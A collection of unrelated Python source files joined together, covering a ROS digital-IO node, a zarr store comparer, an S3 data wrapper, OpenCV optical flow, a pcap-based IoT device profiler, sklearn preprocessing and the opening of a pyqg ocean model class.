if len(sys.argv) == 1:
file_in = 'dubliners'
else:
file_in = sys.argv[1]
wordCount(file_in)
|
#!/usr/bin/env python
import rospy
import itertools
from robotnik_msgs.srv import set_digital_output, set_digital_outputRequest, set_named_digital_output, set_named_digital_outputResponse
from robotnik_msgs.msg import inputs_outputs, named_input_output, named_inputs_outputs
class NamedIO():
def __init__(self):
# inputs
self._i_dict = {}
# outputs
self._o_dict = {}
# publisher
self._pub = rospy.Publisher('~named_inputs_outputs', named_inputs_outputs, queue_size=1)
# service
self._write_digital_output = rospy.ServiceProxy('robotnik_modbus_io/write_digital_output', set_digital_output)
def get_digital_output_number(self, req):
'''
Returns the output and value if the name exists
'''
output = 0
value = False
if self._o_dict.has_key(req.name):
output = self._o_dict[req.name][0]['number']
value = req.value
return output, value
rospy.logwarn(req.name + " not exists")
return None, None
def inputs_callback(self, data):
'''
Publish the input data through a topic
'''
msg = named_inputs_outputs()
msg.digital_inputs = []
for key in self._i_dict:
named_io = named_input_output()
named_io.name = key
named_io.value = data.digital_inputs[self._i_dict[key][0]['number'] - 1]
msg.digital_inputs.append(named_io)
self._pub.publish(msg)
def set_named_digital_output_callback(self, req):
'''
NamedIO service. It gets the number and the output value, then calls
to a service from robotnik_modbus_io.
'''
response = set_named_digital_outputResponse()
response.ret = True
# set the correct information
out, value = self.get_digital_output_number(req)
if out == None:
response.ret = False
else:
# Call the modbus_io service
srv_response = self.set_digital_output(out, value)
if not srv_response:
response.ret = False
return response
def set_digital_output(self, output, value):
'''
Function that writes the info received into the write_digital_output service
'''
rospy.wait_for_service('robotnik_modbus_io/write_digital_output')
try:
request = set_digital_outputRequest()
request.output = output
request.value = value
response = self._write_digital_output(request)
return response
except rospy.ServiceException, e:
rospy.logerr('write_digital_output service call failed')
return False
def setup(self):
# Set up the params
self._o_dict = rospy.get_param('outputs')
self._i_dict = rospy.get_param('inputs')
service = rospy.Service('named_io/set_named_digital_output', set_named_digital_output, self.set_named_digital_output_callback)
rospy.Subscriber("robotnik_modbus_io/input_output", inputs_outputs, self.inputs_callback)
if __name__ == '__main__':
rospy.init_node('named_io_node')
mb = NamedIO()
mb.setup()
rospy.spin()
|
from collections.abc import MutableMapping
import json
class StoreComparer(MutableMapping):
"""
Compare two store implementations, and make sure to do the same operation on both stores.
The operation from the first store are always considered as reference and
the will make sure the second store will return the same value, or raise
the same exception where relevant.
This should have minimal impact on API, but can as some generators are reified and sorted to make sure they are identical.
"""
def __init__(self, reference, tested):
self.reference = reference
self.tested = tested
def __getitem__(self, key):
try:
k1 = self.reference[key]
except Exception as e1:
try:
k2 = self.tested[key]
assert False, f"should raise, got {k2} for {key}"
except Exception as e2:
raise
if not isinstance(e2, type(e1)):
raise AssertionError("Expecting {type(e1)} got {type(e2)}") from e2
raise
k2 = self.tested[key]
if key.endswith((".zgroup", ".zarray")):
j1, j2 = json.loads(k1.decode()), json.loads(k2.decode())
assert j1 == j2, f"{j1} != {j2}"
else:
assert k2 == k1, f"{k1} != {k2}"
return k1
def __setitem__(self, key, value):
# todo : not quite happy about casting here, maybe we shoudl stay strict ?
from numcodecs.compat import ensure_bytes
values = ensure_bytes(value)
try:
self.reference[key] = value
except Exception as e:
try:
self.tested[key] = value
except Exception as e2:
assert isinstance(e, type(e2))
try:
self.tested[key] = value
except Exception as e:
raise
assert False, f"should not raise, got {e}"
def keys(self):
try:
k1 = list(sorted(self.reference.keys()))
except Exception as e1:
try:
k2 = self.tested.keys()
assert False, "should raise"
except Exception as e2:
assert isinstance(e2, type(e1))
raise
k2 = sorted(self.tested.keys())
assert k2 == k1, f"got {k2}, expecting {k1}"
return k1
def __delitem__(self, key):
try:
del self.reference[key]
except Exception as e1:
try:
del self.tested[key]
assert False, "should raise"
except Exception as e2:
assert isinstance(e2, type(e1))
raise
del self.tested[key]
def __iter__(self):
return iter(self.keys())
def __len__(self):
return len(self.keys())
def __contains__(self, key):
return key in self.reference
|
"""
Wrappers for handling remote run data (S3)
"""
from pathlib import Path
from typing import List
from autumn import settings
from autumn.core.utils import s3
class RemoteRunData:
def __init__(self, run_id: str, client=None):
"""Remote (S3) wrapper for a given run_id
Args:
run_id (str): AuTuMN run_id string
client (optional): S3 client object (will be created if not supplied)
"""
self.run_id = run_id
if client is None:
client = s3.get_s3_client()
self.client = client
self.local_path_base = Path(settings.DATA_PATH) / 'outputs/runs'
self.local_path_run = self.local_path_base / run_id
def list_contents(self, suffix:str =None) -> List[str]:
"""Return a list of all files for this run
These can be passed directly into the download method
Args:
suffix ([str], optional): Filter output by suffix
Returns:
[List[str]]: List of files
"""
return s3.list_s3(self.client, self.run_id, suffix)
def _get_full_metadata(self):
"""Complete S3 metadata for all objects in this run
Returns:
[dict]: Metadata
"""
return self.client.list_objects_v2(Bucket=settings.S3_BUCKET, Prefix=self.run_id)
def download(self, remote_path: str):
"""Download a remote file and place it in the corresponding local path
Args:
remote_path (str): Full string of remote file path
"""
# Strip the filename from the end of the path
split_path = remote_path.split('/')
filename = split_path[-1]
dir_only = '/'.join(split_path[:-1])
local_path = self.local_path_base / dir_only
local_path.mkdir(parents=True, exist_ok=True)
full_local = local_path.joinpath(filename)
s3.download_s3(self.client, remote_path, str(full_local))
def __repr__(self):
return f"RemoteRunData: {self.run_id}"
|
import numpy as np
import sklearn
import tensorflow as tf
from questions.utils import py_str
from .symbol_cost import SymbolCostModel
class Direct(SymbolCostModel):
def __init__(self, questions):
super().__init__()
self.costs = {}
for p, q in questions.items():
self.costs[p] = self.optimize_cost(q)
def call(self, problems):
# `Model.test_step` pads `problems` with a length 1 axis.
if len(problems.shape) == 2:
problems = tf.squeeze(problems, axis=1)
fn_output_signature = [tf.RaggedTensorSpec(shape=[None], dtype=self.dtype, ragged_rank=0),
tf.TensorSpec(tf.TensorShape([]), dtype=tf.bool)]
res = tf.map_fn(self.predict_one, problems, fn_output_signature=fn_output_signature)
return {'costs': res[0], 'valid': res[1]}
def predict_one(self, problem):
return tf.py_function(self._predict_one, [problem], (self.dtype, tf.bool))
def _predict_one(self, problem):
problem = py_str(problem)
try:
return self.costs[problem], True
except KeyError:
return self.invalid_costs(), False
def invalid_costs(self):
return tf.constant(0, dtype=self.dtype, shape=(0,))
def optimize_cost(self, questions, normalize=True):
if normalize:
questions = sklearn.preprocessing.normalize(questions)
cost = np.mean(questions, axis=0)
assert np.mean(np.dot(questions, cost) > 0) >= 0.5
cost = tf.constant(cost, dtype=self.dtype)
return cost
|
from __future__ import print_function
import wspc
try:
c = wspc.Client('ws://localhost:9001')
'''
Go to http://localhost:9001 to get list of supported remote procedures
and notifications along with their arguments
'''
c.callbacks.ping_event(
lambda tick: print('ping - tick: {}'.format(tick)))
# We can't use directly c.ping() since it's already
# defined for ws4py.client.threadedclient.WebSocketClient
ping_response = c.__getattr__('ping')()
print('ping2() response: {}'.format(ping_response))
ping_response = c.ping2()
print('ping() response: {}'.format(ping_response['tick']))
notify_resp = c.notify(2)
print('notify() response: {}'.format(notify_resp))
add_resp = c.calculate(arg1=20, arg2=5, op='add', comment='adding 20 to 5')
print('calculate(20, 5, ''add'') response: {}'.format(add_resp))
divide_resp = c.calculate(arg1=16, arg2=5, op='divide')
print('calculate(16, 5, ''divide'') response: {}'.format(divide_resp))
# We can also use *args instead of **kwargs. In that case we have to provide
# all arguments - even optional ones - in correct order
multiply_resp = c.calculate(16, 8, 'multiply', 'comment')
print('calculate(16, 8, ''multiply'') response: {}'.format(multiply_resp))
ops = ['add', 'subtract', 'multiply', 'divide']
for i in range(10):
print('{0} "{2}" {1} = {3}'.format(16 * i, 5 + i,
ops[i % 4], c.calculate2(16 * i, 5 + i, ops[i % 4])))
# Wrong function
c.calclate()
# wait for events
c.run_forever()
except KeyboardInterrupt:
c.close()
|
SERVER_CONNECTION_ERROR = 1
NOT_INSTARTER_SERVER = 2
VERSION_MISMATCH = 3
NOT_REGISTERED = 4
LOG_FILE_DOESNT_EXIST = 5
NOT_AMAZON_INSTANCE = 6
CONFIG_FILE_DOESNT_EXIST = 7
class NotInstarterServerError(Exception):
pass
class VersionMismatchError(Exception):
pass
class NotConfiguredInstance(Exception):
pass
|
#!/usr/bin/env python
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
figure = plt.figure()
axes = figure.add_subplot(111)
xs = range(20)
def y(x, a, b):
return x * a + b
for b in range(-5, 6):
axes.plot(xs, [y(x, 1, b) for x in xs])
axes.axis(xmin=0, xmax=10, ymin=-5, ymax=15)
axes.set_xscale('log')
axes.set_yscale('log')
figure.savefig('graph.pdf')
|
import numpy as np
import cv2
cap = cv2.VideoCapture(0)
# params for ShiTomasi corner detection
feature_params = dict( maxCorners = 10,
qualityLevel = 0.3,
minDistance = 7,
blockSize = 7 )
# Parameters for lucas kanade optical flow
lk_params = dict( winSize = (15,15),
maxLevel = 2,
criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))
# Create some random colors
color = np.random.randint(0,255,(10,3))
# Take first frame and find corners in it
ret, old_frame = cap.read()
old_gray = cv2.cvtColor(old_frame, cv2.COLOR_BGR2GRAY)
p0 = cv2.goodFeaturesToTrack(old_gray, mask = None, **feature_params)
frame_number = 1
frame_update_gap = 30
while(1):
ret,frame = cap.read()
frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
#update the features after certain set of frames
if (frame_number% frame_update_gap ==0):
if p0.size < 20 :
feature_params['maxCorners']=int((20-p0.size)/2)
new_points = cv2.goodFeaturesToTrack(old_gray, mask = None, **feature_params)
p0 = np.concatenate((p0,new_points))
frame_number = 1
frame_number+=1
# calculate optical flow
p1, st, err = cv2.calcOpticalFlowPyrLK(old_gray, frame_gray, p0, None, **lk_params)
# Select good points
good_new = p1[st==1]
good_old = p0[st==1]
# draw the tracks
for i,(new,old) in enumerate(zip(good_new,good_old)):
a,b = new.ravel()
c,d = old.ravel()
dist = (a-c)**2+(b-d)**2
if dist < 10:
frame = cv2.circle(frame,(a,b),5,color[i].tolist(),-1)
else:
np.delete(good_new,i)
cv2.imshow('frame',frame)
k = cv2.waitKey(30) & 0xff
if k == 27:
break
# Now update the previous frame and previous points
old_gray = frame_gray.copy()
p0 = good_new.reshape(-1,1,2)
cap.release()
cv2.destroyAllWindows()
|
import pyshark
import sys
import ipaddress
from filter import Filter
class Result:
def __init__(self, tag, comment):
self.tag = tag
self.comment = comment
class Probability:
def __init__(self, device_type, value):
self.device_type = device_type
self.value = value
def calculate_heartbeat(cap_sum): # use cap_sum
time_differences = []
for i in range(1, len(cap_sum)):
time_differences.append(float(cap_sum[i].time) - float(cap_sum[i-1].time))
heartbeat = sum(time_differences) / (len(cap_sum) - 1)
return heartbeat
def calculate_upload_and_download_ratio(ip, cap): # use cap
upload_size = 0
download_size = 0
for pkt in cap:
try:
if ipaddress.ip_address(pkt.ip.src).is_multicast or ipaddress.ip_address(pkt.ip.dst).is_multicast:
continue
elif pkt.ip.src == '255.255.255.255' or pkt.ip.dst == '255.255.255.255':
continue
elif pkt.ip.src == ip:
upload_size = upload_size + int(pkt.length)
elif pkt.ip.dst == ip:
download_size = download_size + int(pkt.length)
except AttributeError:
pass
upload_ratio = upload_size / (upload_size + download_size)
download_ratio = download_size / (download_size + upload_size)
return upload_ratio, download_ratio
def calculate_local_and_global_packets_ratio(cap): # use cap
local_packets = 0
multicast_packets = 0
global_packets = 0
for pkt in cap:
try:
if ipaddress.ip_address(pkt.ip.src).is_private and ipaddress.ip_address(pkt.ip.dst).is_private:
local_packets = local_packets + 1
elif ipaddress.ip_address(pkt.ip.src).is_multicast or ipaddress.ip_address(pkt.ip.dst).is_multicast:
multicast_packets = multicast_packets + 1
else:
global_packets = global_packets + 1
except AttributeError:
pass
total_packets = local_packets + multicast_packets + global_packets
local_packets_ratio = local_packets / total_packets
global_packets_ratio = global_packets / total_packets
return local_packets_ratio, global_packets_ratio
def calculate_data_rate(cap_sum): # use cap_sum
time = []
cumulative_size = 0
for pkt in cap_sum:
time.append(pkt.time)
cumulative_size = cumulative_size + float(pkt.length)
total_time = float(time[-1]) - float(time[0])
data_rate = cumulative_size / total_time
return data_rate
def generate_protocol_list(cap_sum): # use cap_sum
protocols = []
for pkt in cap_sum:
for protocol in protocols:
if protocol == pkt.protocol:
break
else:
protocols.append(pkt.protocol)
return protocols
def use_tuya_api(cap): # use cap
for pkt in cap:
try:
protocol = pkt.transport_layer
dst_port = pkt[pkt.transport_layer].dstport
if protocol == "UDP" and dst_port == "6666":
return 1
except AttributeError: # ignore packets that aren't TCP/UDP or IPv4
pass
else:
return 0
def has_public_ip(mac, cap):
for pkt in cap:
try:
if (pkt.eth.src == mac and ipaddress.ip_address(pkt.ip.src).is_global) or (
pkt.eth.dst == mac and ipaddress.ip_address(pkt.ip.dst).is_global):
return 1
except AttributeError:
pass
else:
return 0
def is_encrypted(protocols):
for protocol in protocols:
if protocol == 'TLSv1.2' or protocol == 'TLSv1':
return 1
return 0
def is_lightweight(protocols):
for protocol in protocols:
if protocol == 'MQTT':
return 1
return 0
def is_iot(protocols):
for protocol in protocols:
if protocol == 'MDNS':
return 1
return 0
def is_upnp(protocols):
for protocol in protocols:
if protocol == 'SSDP':
return 1
return 0
def is_time_synchronizer(protocols):
for protocol in protocols:
if protocol == 'NTP':
return 1
return 0
def is_unreliable(protocols):
for protocol in protocols:
if protocol == 'UDP':
return 1
return 0
def is_low_local_ratio(local_packets_ratio):
if local_packets_ratio < 0.1:
return 1
else:
return 0
def is_medium_local_ratio(local_packets_ratio):
if 0.1 <= local_packets_ratio <= 0.3:
return 1
else:
return 0
def is_high_local_ratio(local_packets_ratio):
if local_packets_ratio > 0.3:
return 1
else:
return 0
def is_talkative(data_rate, heartbeat):
if data_rate > 500 and heartbeat < 1:
return 1
else:
return 0
def is_neither_talkative_nor_shy(data_rate, heartbeat):
if 90 <= data_rate <= 500 or 1 <= heartbeat <= 3:
return 1
else:
return 0
def is_shy(data_rate, heartbeat):
if data_rate < 90 and heartbeat > 3:
return 1
else:
return 0
def is_uploader(upload_ratio, download_ratio):
if upload_ratio - download_ratio >= 0.45:
return 1
else:
return 0
def is_neither_uploader_nor_downloader(upload_ratio, download_ratio):
if abs(upload_ratio - download_ratio) < 0.45:
return 1
else:
return 0
def is_downloader(upload_ratio, download_ratio):
if download_ratio - upload_ratio >= 0.45:
return 1
else:
return 0
def check_premium():
if has_public_ip(mac, cap):
return 0
else:
premium_probability = 0.5 * is_medium_local_ratio(local_ratio) + 0.15 * is_encrypted(protocol_list) \
+ 0.2 * is_talkative(data_rate, heartbeat) + 0.15 * is_time_synchronizer(protocol_list)
return premium_probability
def check_bulb():
if has_public_ip(mac, cap):
return 0
else:
bulb_probability = 0.45 * is_low_local_ratio(local_ratio) + 0.35 * is_iot(protocol_list) \
+ 0.2 * is_shy(data_rate, heartbeat) \
+ 0.2 * is_neither_talkative_nor_shy(data_rate, heartbeat)
return bulb_probability
def check_strip():
if has_public_ip(mac, cap):
return 0
else:
strip_probability1 = 0.8 * is_lightweight(protocol_list) + 0.1 * is_unreliable(protocol_list) \
+ 0.1 * is_iot(protocol_list)
strip_probability2 = 0.8 * is_high_local_ratio(local_ratio) + 0.2 * is_iot(protocol_list)
if strip_probability1 > strip_probability2:
return strip_probability1
else:
return strip_probability2
def check_camera():
if has_public_ip(mac, cap):
return 0
else:
camera_probability = 0.6 * is_uploader(upload_ratio, download_ratio) + 0.4 * is_talkative(data_rate, heartbeat)
return camera_probability
def check_router():
return has_public_ip(mac, cap)
def continue_or_exit():
while True:
try:
print()
choice = input("Do you want to profile another device in the same .pcap file? (y/n) ")
if choice == 'y' or choice == 'Y':
return
elif choice == 'n' or choice == 'N':
print("Thanks for using. Goodbye!")
exit()
else:
raise ValueError
except ValueError:
print("Invalid input! Please try again.")
def add_tags(manufacturer):
print("Now profiling: " + manufacturer, end='', flush=True)
if use_tuya_api(cap):
results.append(Result("Tuya IoT Platform", "Using Tuya API"))
if has_public_ip(mac, cap):
results.append(Result("Has public IP", "Has public IP associated with MAC"))
if is_uploader(upload_ratio, download_ratio):
results.append(Result("Uploader", "Upload % = {:.2f}%, Download % = {:.2f}%".format(upload_ratio * 100, download_ratio * 100)))
if is_neither_uploader_nor_downloader(upload_ratio, download_ratio):
results.append(Result("Neither uploader nor downloader", "Upload % = {:.2f}%, Download % = {:.2f}%".format(upload_ratio * 100, download_ratio * 100)))
if is_downloader(upload_ratio, download_ratio):
results.append(Result("Downloader", "Upload % = {:.2f}%, Download % = {:.2f}%".format(upload_ratio * 100, download_ratio * 100)))
if is_iot(protocol_list):
results.append(Result("IoT", "Using MDNS Protocol"))
if is_unreliable(protocol_list):
results.append(Result("Has unreliable traffic", "Using UDP Protocol"))
if is_lightweight(protocol_list):
results.append(Result("Lightweight", "Using MQTT Protocol"))
if is_upnp(protocol_list):
results.append(Result("Universal plug and play", "Using SSDP Protocol"))
if is_encrypted(protocol_list):
results.append(Result("Encrypted", "Using TLSv1 or TLSv1.2 Protocol"))
if is_time_synchronizer(protocol_list):
results.append(Result("Time synchronizer", "Using NTP Protocol"))
if is_high_local_ratio(local_ratio):
results.append(Result("High local packets ratio", "Local % = {:.2f}%, Global % = {:.2f}%".format(local_ratio * 100, global_ratio * 100)))
if is_medium_local_ratio(local_ratio):
results.append(Result("Medium local packets ratio", "Local % = {:.2f}%, Global % = {:.2f}%".format(local_ratio * 100, global_ratio * 100)))
if is_low_local_ratio(local_ratio):
results.append(Result("Low local packets ratio", "Local % = {:.2f}%, Global % = {:.2f}%".format(local_ratio * 100, global_ratio * 100)))
if is_talkative(data_rate, heartbeat):
results.append(Result("Talkative", "Data Rate = {:.2f}B/s, Heartbeat = {:.2f}s".format(data_rate, heartbeat)))
if is_neither_talkative_nor_shy(data_rate, heartbeat):
results.append(Result("Neither talkative nor shy", "Data Rate = {:.2f}B/s, Heartbeat = {:.2f}s".format(data_rate, heartbeat)))
if is_shy(data_rate, heartbeat):
results.append(Result("Shy", "Data Rate = {:.2f}B/s, Heartbeat = {:.2f}s".format(data_rate, heartbeat)))
print("...Done")
def print_tags():
print()
print('{:^78s}'.format("Profiling Result"))
print('------------------------------------------------------------------------------')
print('| {:^31s} | {:^40s} |'.format("Tag", "Comment"))
print('------------------------------------------------------------------------------')
for result in results:
print('| {:^31s} | {:^40s} |'.format(result.tag, result.comment))
print('------------------------------------------------------------------------------')
print()
def calculate_probabilities(manufacturer):
print("Now calculating probabilities for: " + manufacturer, end='', flush=True)
probabilities.append(Probability("Router", "{:.2f}%".format(check_router() * 100)))
probabilities.append(Probability("Voice Assistant", "{:.2f}%".format(check_premium() * 100)))
probabilities.append(Probability("Bulb", "{:.2f}%".format(check_bulb() * 100)))
probabilities.append(Probability("Strip", "{:.2f}%".format(check_strip() * 100)))
probabilities.append(Probability("Camera", "{:.2f}%".format(check_camera() * 100)))
print("...Done")
def print_probabilities():
print()
print('{:^29s}'.format("Probable Type"))
print('-----------------------------')
print('| {:^15s} | {:^7s} |'.format("Device Type", "Value"))
print('-----------------------------')
for probability in probabilities:
print('| {:^15s} | {:^7s} |'.format(probability.device_type, probability.value))
print('-----------------------------')
if __name__ == "__main__":
unfiltered_cap = pyshark.FileCapture(sys.argv[1])
unfiltered_cap_sum = pyshark.FileCapture(sys.argv[1], only_summaries=True)
pkt_filter = Filter(unfiltered_cap, unfiltered_cap_sum)
pkt_filter.create_device_list()
while True:
results = []
probabilities = []
pkt_filter.print_device_list()
pkt_filter.ask_for_device()
cap, cap_sum = pkt_filter.filter_packets()
ip = pkt_filter.get_profile_device_ip()
mac = pkt_filter.get_profile_device_mac()
manufacturer = pkt_filter.get_profile_device_manufacturer()
upload_ratio, download_ratio = calculate_upload_and_download_ratio(ip, cap)
protocol_list = generate_protocol_list(cap_sum)
local_ratio, global_ratio = calculate_local_and_global_packets_ratio(cap)
data_rate = calculate_data_rate(cap_sum)
heartbeat = calculate_heartbeat(cap_sum)
add_tags(manufacturer)
print_tags()
calculate_probabilities(manufacturer)
print_probabilities()
continue_or_exit()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun May 13 20:22:46 2018
@author: vinicius
"""
#Data preprocessing
#Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
np.set_printoptions(threshold=np.nan) #to be able to see the full array
#Import the dataset
dataset = pd.read_csv('Data.csv')
x = dataset.iloc[:,:-1].values
y = dataset.iloc[:, 3].values
# Handling the missing data
from sklearn.preprocessing import Imputer
imputer = Imputer(missing_values='NaN', strategy='mean', axis=0)
imputer = imputer.fit(x[:, 1:3]) #upper bound excluded, thus use 3 instead of 2 for the index of last column
x[:, 1:3] = imputer.transform(x[:, 1:3])
# Encoding categorical data
from sklearn.preprocessing import LabelEncoder, OneHotEncoder
label_encoder_x = LabelEncoder()
x[:, 0] = label_encoder_x.fit_transform(x[:, 0])
one_hot_enconder = OneHotEncoder(categorical_features=[0])
x = one_hot_enconder.fit_transform(x).toarray()
label_encoder_y = LabelEncoder()
y = label_encoder_y.fit_transform(y)
# Splitting the dataset into the training set and test set
from sklearn.cross_validation import train_test_split
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size = 0.2, random_state = 0)
# Feature scaling
from sklearn.preprocessing import StandardScaler
sc_x = StandardScaler()
x_train = sc_x.fit_transform(x_train)
x_test = sc_x.transform(x_test) |
import numpy as np
from numpy import pi
import logging
import warnings
import inspect
from .errors import DiagnosticNotFilledError
from .kernel import PseudoSpectralKernel, tendency_forward_euler, tendency_ab2, tendency_ab3
from .parameterizations import Parameterization
try:
import mkl
np.use_fastnumpy = True
except ImportError:
pass
try:
import pyfftw
pyfftw.interfaces.cache.enable()
except ImportError:
pass
class Model(PseudoSpectralKernel):
"""A generic pseudo-spectral inversion model.
Attributes
----------
nx, ny : int
Number of real space grid points in the `x`, `y` directions (cython)
nk, nl : int
Number of spectral space grid points in the `k`, `l` directions (cython)
nz : int
Number of vertical levels (cython)
kk, ll : real array
Zonal and meridional wavenumbers (`nk`) (cython)
a : real array
inversion matrix (`nk`, `nk`, `nl`, `nk`) (cython)
q : real array
Potential vorticity in real space (`nz`, `ny`, `nx`) (cython)
qh : complex array
Potential vorticity in spectral space (`nk`, `nl`, `nk`) (cython)
ph : complex array
Streamfunction in spectral space (`nk`, `nl`, `nk`) (cython)
u, v : real array
Zonal and meridional velocity anomalies in real space (`nz`, `ny`, `nx`) (cython)
Ubg : real array
Background zonal velocity (`nk`) (cython)
Qy : real array
Background potential vorticity gradient (`nk`) (cython)
ufull, vfull : real arrays
Zonal and meridional full velocities in real space (`nz`, `ny`, `nx`) (cython)
uh, vh : complex arrays
Velocity anomaly components in spectral space (`nk`, `nl`, `nk`) (cython)
rek : float
Linear drag in lower layer (cython)
t : float
Model time (cython)
tc : int
Model timestep (cython)
dt : float
Numerical timestep (cython)
L, W : float
Domain length in x and y directions
filterfac : float
Amplitdue of the spectral spherical filter
twrite : int
Interval for cfl writeout (units: number of timesteps)
tmax : float
Total time of integration (units: model time)
tavestart : float
Start time for averaging (units: model time)
tsnapstart : float
Start time for snapshot writeout (units: model time)
taveint : float
Time interval for accumulation of diagnostic averages.
(units: model time)
tsnapint : float
Time interval for snapshots (units: model time)
ntd : int
Number of threads to use. Should not exceed the number of cores on
your machine.
pmodes : real array
Vertical pressure modes (unitless)
radii : real array
Deformation radii (units: model length)
q_parameterization : function or pyqg.Parameterization
Optional :code:`Parameterization` object or function which takes
the model as input and returns a :code:`numpy` array of shape
:code:`(nz, ny, nx)` to be added to :math:`\partial_t q` before
stepping forward. This can be used to implement subgrid forcing
parameterizations.
uv_parameterization : function or pyqg.Parameterization
Optional :code:`Parameterization` object or function which takes
the model as input and returns a tuple of two :code:`numpy` arrays,
each of shape :code:`(nz, ny, nx)`, to be added to the zonal and
meridional velocity derivatives (respectively) at each timestep (by
adding their curl to :math:`\partial_t q`). This can also be used
to implemented subgrid forcing parameterizations, but expressed in
terms of velocity rather than potential vorticity.
"""
def __init__(
self,
# grid size parameters
nz=1,
nx=64, # grid resolution
ny=None,
L=1e6, # domain size is L [m]
W=None,
# timestepping parameters
dt=7200., # numerical timestep
twrite=1000., # interval for cfl and ke writeout (in timesteps)
tmax=1576800000., # total time of integration
tavestart=315360000., # start time for averaging
taveint=86400., # time interval used for summation in longterm average in seconds
useAB2=False, # use second order Adams Bashforth timestepping instead of 3rd
# friction parameters
rek=5.787e-7, # linear drag in lower layer
filterfac=23.6, # the factor for use in the exponential filter
# constants
f = None, # coriolis parameter (not necessary for two-layer model
# if deformation radius is provided)
g= 9.81, # acceleration due to gravity
q_parameterization=None, # subgrid parameterization in terms of q
uv_parameterization=None, # subgrid parameterization in terms of u,v
parameterization=None, # subgrid parameterization (type will be inferred)
# diagnostics parameters
diagnostics_list='all', # which diagnostics to output
# fft parameters
# removed because fftw is now manditory
#use_fftw = False, # fftw flag
#teststyle = False, # use fftw with "estimate" planner to get reproducibility
ntd = 1, # number of threads to use in fftw computations
log_level = 1, # logger level: from 0 for quiet (no log) to 4 for verbose
# logger (see https://docs.python.org/2/library/logging.html)
logfile = None, # logfile; None prints to screen
):
"""
.. note:: All of the test cases use ``nx==ny``. Expect bugs if you choose
these parameters to be different.
.. note:: All time intervals will be rounded to nearest `dt` interval.
Parameters
----------
nx : int
Number of grid points in the x direction.
ny : int
Number of grid points in the y direction (default: nx).
L : number
Domain length in x direction. Units: meters.
W :
Domain width in y direction. Units: meters (default: L).
rek : number
linear drag in lower layer. Units: seconds :sup:`-1`.
filterfac : number
amplitdue of the spectral spherical filter (originally 18.4, later
changed to 23.6).
dt : number
Numerical timstep. Units: seconds.
twrite : int
Interval for cfl writeout. Units: number of timesteps.
tmax : number
Total time of integration. Units: seconds.
tavestart : number
Start time for averaging. Units: seconds.
tsnapstart : number
Start time for snapshot writeout. Units: seconds.
taveint : number
Time interval for accumulation of diagnostic averages.
Units: seconds. (For performance purposes, averaging does not have to
occur every timestep)
tsnapint : number
Time interval for snapshots. Units: seconds.
ntd : int
Number of threads to use. Should not exceed the number of cores on
your machine.
q_parameterization : function or pyqg.Parameterization
Optional :code:`Parameterization` object or function which takes
the model as input and returns a :code:`numpy` array of shape
:code:`(nz, ny, nx)` to be added to :math:`\partial_t q` before
stepping forward. This can be used to implement subgrid forcing
parameterizations.
uv_parameterization : function or pyqg.Parameterization
Optional :code:`Parameterization` object or function which takes
the model as input and returns a tuple of two :code:`numpy` arrays,
each of shape :code:`(nz, ny, nx)`, to be added to the zonal and
meridional velocity derivatives (respectively) at each timestep (by
adding their curl to :math:`\partial_t q`). This can also be used
to implemented subgrid forcing parameterizations, but expressed in
terms of velocity rather than potential vorticity.
parameterization : pyqg.Parameterization
An explicit :code:`Parameterization` object representing either a
velocity or potential vorticity parameterization, whose type will
be inferred.
"""
if ny is None:
ny = nx
if W is None:
W = L
# if an explicit parameterization object was passed without a given
# type, infer it from its attributes
if parameterization is not None:
ptype = getattr(parameterization, "parameterization_type", None)
if ptype == 'uv_parameterization':
assert uv_parameterization is None
uv_parameterization = parameterization
elif ptype == 'q_parameterization':
assert q_parameterization is None
q_parameterization = parameterization
else:
raise ValueError(f"unknown parameterization type {ptype}")
# TODO: be more clear about what attributes are cython and what
# attributes are python
PseudoSpectralKernel.__init__(self, nz, ny, nx, ntd,
has_q_param=int(q_parameterization is not None),
has_uv_param=int(uv_parameterization is not None))
self.L = L
self.W = W
# timestepping
self.dt = dt
self.twrite = twrite
self.tmax = tmax
self.tavestart = tavestart
self.taveint = taveint
self.logfile = logfile
self.log_level = log_level
self.useAB2 = useAB2
self.ntd = ntd
# friction
self.rek = rek
self.filterfac = filterfac
# constants
self.g = g
if f:
self.f = f
self.f2 = f**2
# optional subgrid parameterizations
self.q_parameterization = q_parameterization
self.uv_parameterization = uv_parameterization
# TODO: make this less complicated!
# Really we just need to initialize the grid here. It's not necessary
# to have all these silly methods. Maybe we need "hooks" instead.
self._initialize_logger()
self._initialize_grid()
self._initialize_background()
self._initialize_forcing()
self._initialize_filter()
self._initialize_time()
self._initialize_inversion_matrix()
self._initialize_diagnostics(diagnostics_list)
def run_with_snapshots(self, tsnapstart=0., tsnapint=432000.):
"""Run the model forward, yielding to user code at specified intervals.
Parameters
----------
tsnapstart : int
The timestep at which to begin yielding.
tstapint : int
The interval at which to yield.
"""
tsnapints = np.ceil(tsnapint/self.dt)
while(self.t < self.tmax):
self._step_forward()
if self.t>=tsnapstart and (self.tc%tsnapints)==0:
yield self.t
return
def run(self):
"""Run the model forward without stopping until the end."""
while(self.t < self.tmax):
self._step_forward()
def vertical_modes(self):
""" Calculate standard vertical modes. Simply
the eigenvectors of the stretching matrix S """
evals,evecs = np.linalg.eig(-self.S)
asort = evals.argsort()
# deformation wavenumbers and radii
self.kdi2 = evals[asort]
self.radii = np.zeros_like(self.kdi2)
self.radii[0] = np.sqrt(self.g*self.H)/np.abs(self.f) # barotropic def. radius
self.radii[1:] = 1./np.sqrt(self.kdi2[1:])
# eigenstructure
self.pmodes = evecs[:,asort]
# normalize to have unit L2-norm
Ai = (self.H / (self.Hi[:,np.newaxis]*(self.pmodes**2)).sum(axis=0))**0.5
self.pmodes = Ai[np.newaxis,:]*self.pmodes
def modal_projection(self,p,forward=True):
""" Performs a field p into modal amplitudes pn
using the basis [pmodes]. The inverse
transform calculates p from pn"""
if forward:
pt = np.linalg.solve(self.pmodes[np.newaxis,np.newaxis],p.T).T
else:
pt = np.einsum("ik,k...->i...",self.pmodes,p)
return pt
def stability_analysis(self,bottom_friction=False):
r""" Performs the baroclinic linear instability analysis given
given the base state velocity :math: `(U, V)` and
the stretching matrix :math: `S`:
.. math:: A \Phi = \omega B \Phi,
where
.. math:: A = B (U k + V l) + I (k Q_y - l Q_x) +
